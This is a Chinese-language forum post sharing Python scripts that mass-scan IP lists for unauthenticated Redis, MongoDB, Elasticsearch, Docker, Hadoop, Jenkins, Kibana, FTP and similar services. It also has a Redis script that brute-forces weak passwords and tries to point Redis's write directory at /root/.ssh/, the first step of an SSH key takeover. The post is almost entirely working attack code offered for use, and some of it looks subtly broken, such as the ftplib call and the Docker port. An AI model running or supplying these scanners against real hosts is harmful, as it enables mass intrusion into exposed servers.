一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢?
这里提供2个思路
一、msf的扫描
找到
1.1、指定文件ip扫描
192.168.100.222
192.168.100.223
192.168.100.224
192.168.100.225
192.168.100.226
这样一行一行写入文本
1.2、指定网络段ip扫描
一般都是扫C段,也就是/24就行了,尽量不要去搞A(8)、B段(16),太多了
二、楼主这里提供一些批量poc
import socket
import pymongo
import requests
import ftplib
from tqdm import tqdm
import sys
from concurrent.futures import ThreadPoolExecutor
def redis(ip):
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 6379))
s.send(bytes("INFO\r\n", 'UTF-8'))
result = s.recv(1024).decode()
if "redis_version" in result:
print(ip + ":6379 redis未授权")
s.close()
except Exception as e:
pass
finally:
bar.update(1)
def mongodb(ip):
try:
conn = pymongo.MongoClient(ip, 27017, socketTimeoutMS=4000)
dbname = conn.list_database_names()
print(ip + ":27017 mongodb未授权")
conn.close()
except Exception as e:
pass
finally:
bar.update(1)
def memcached(ip):
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 11211))
s.send(bytes('stats\r\n', 'UTF-8'))
if 'version' in s.recv(1024).decode():
print(ip + ":11211 memcached未授权")
s.close()
except Exception as e:
pass
finally:
bar.update(1)
def elasticsearch(ip):
try:
url = 'http://' + ip + ':9200/_cat'
r = requests.get(url, timeout=5)
if '/_cat/master' in r.content.decode():
print(ip + ":9200 elasticsearch未授权")
except Exception as e:
pass
finally:
bar.update(1)
def zookeeper(ip):
try:
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 2181))
s.send(bytes('envi', 'UTF-8'))
data = s.recv(1024).decode()
s.close()
if 'Environment' in data:
print(ip + ":2181 zookeeper未授权")
except:
pass
finally:
bar.update(1)
def ftp(ip):
try:
ftp = ftplib.FTP.connect(ip,21,timeout=5)
ftp.login('anonymous', 'Aa@12345678')
print(ip + ":21 FTP未授权")
except Exception as e:
pass
finally:
bar.update(1)
def CouchDB(ip):
try:
url = 'http://' + ip + ':5984'+'/_utils/'
r = requests.get(url, timeout=5)
if 'couchdb-logo' in r.content.decode():
print(ip + ":5984 CouchDB未授权")
except Exception as e:
pass
finally:
bar.update(1)
def docker(ip):
try:
url = 'http://' + ip + ':6071'+'/version'
r = requests.get(url, timeout=5)
if 'ApiVersion' in r.content.decode():
print(ip + ":6071 docker api未授权")
except Exception as e:
pass
finally:
bar.update(1)
def Hadoop(ip):
try:
url = 'http://' + ip + ':50070'+'/dfshealth.html'
r = requests.get(url, timeout=5)
if 'hadoop.css' in r.content.decode():
print(ip + ":50070 Hadoop未授权")
except Exception as e:
pass
finally:
bar.update(1)
def Jenkins(ip):
try:
url = 'http://' + ip + ':8080'+'/manage'
r = requests.get(url, timeout=5)
if 'Jenkins' in r.content.decode():
print(ip + ":8080 Jenkins api未授权")
except Exception as e:
pass
finally:
bar.update(1)
if __name__ == '__main__':
if len(sys.argv) == 1:
print("Usage:python3 unauthorized-check.py url.txt")
file = sys.argv[1]
with open(file, "r", encoding='UTF-8') as f:
line = [i for i in f.readlines()]
bar = tqdm(total=len(line)*9)
with ThreadPoolExecutor(1000) as pool:
for target in line:
target=target.strip()
pool.submit(redis, target)
pool.submit(Hadoop, target)
pool.submit(docker, target)
pool.submit(CouchDB, target)
pool.submit(ftp, target)
pool.submit(zookeeper, target)
pool.submit(elasticsearch, target)
pool.submit(memcached, target)
pool.submit(mongodb, target)
pool.submit(Jenkins, target)
楼主这里试一试elasticsearch的未授权poc
还有其他的一些单独的批量poc,楼主也放一下。(这里注意使用py2)
Redis的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
print u"%s:%s未授权访问"%(ip,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("config set dir /root/.ssh/\r\n")
content = s.recv(1024)
print(content)
if "OK" in content:
print u"%s:%s .ssh目录存在且权限足够"%(ip,port)
elif "error" in content:
print u"%s:%s 无法写入"%(ip,port)
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("AUTH %s\r\n" %(pass_))
result = s.recv(1024)
if '+OK' in result:
print u"%s:%s存在弱口令,密码:%s" % (ip,port,pass_)
except Exception, e:
print e
pass
if __name__ == '__main__':
doc = open("hello_world.txt", "r")
lines = doc.readlines()
for ip in lines:
#print(type(ip))
#print(ip.strip())
check(ip.strip(),6380,timeout=10)
#print(type(ip))
doc.close()
Kibana的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
def Hadoop_check(ip, port, timeout):
try:
url = "http://"+str(ip)+":"+str(port)+"/app/kibana"
response = requests.get(url)
print(url)
print(response.content)
if "/app/kibana" in response.content:
print '[+++++] Kibana [+++++]: ' +ip+':'+str(port)
except:
pass
if __name__ == '__main__':
doc = open("ip.txt", "r")
lines = doc.readlines()
for ip in lines:
#print(type(ip))
#print(ip.strip())
Hadoop_check(ip.strip(),5601,5)
#print(type(ip))
doc.close()
Hadoop的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
def Hadoop_check(ip, port, timeout):
try:
url = "http://"+str(ip)+":"+str(port)+"/cluster"
response = requests.post(url)
if "/cluster/cluster" in response.content:
print '[+++++] Hadoop [+++++]: ' +ip+':'+str(port)
except:
pass
if __name__ == '__main__':
doc = open("ip.txt", "r")
lines = doc.readlines()
for ip in lines:
#print(type(ip))
print(ip.strip())
Hadoop_check(ip.strip(),8088,5)
#print(type(ip))
doc.close()
Elasticsearch的未授权批量poc
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
def Elasticsearch_check(ip, port, timeout):
try:
url = "http://"+str(ip)+":"+str(port)+"/_cat"
response = requests.get(url)
if "/_cat/master" in response.content:
print '[+++++] Elasticsearch: ' +ip+':'+str(port)
except:
pass
if __name__ == '__main__':
doc = open("ip.txt", "r")
lines = doc.readlines()
for ip in lines:
#print(type(ip))
#print(ip.strip())
Elasticsearch_check(ip.strip(),9200,5)
#print(type(ip))
doc.close()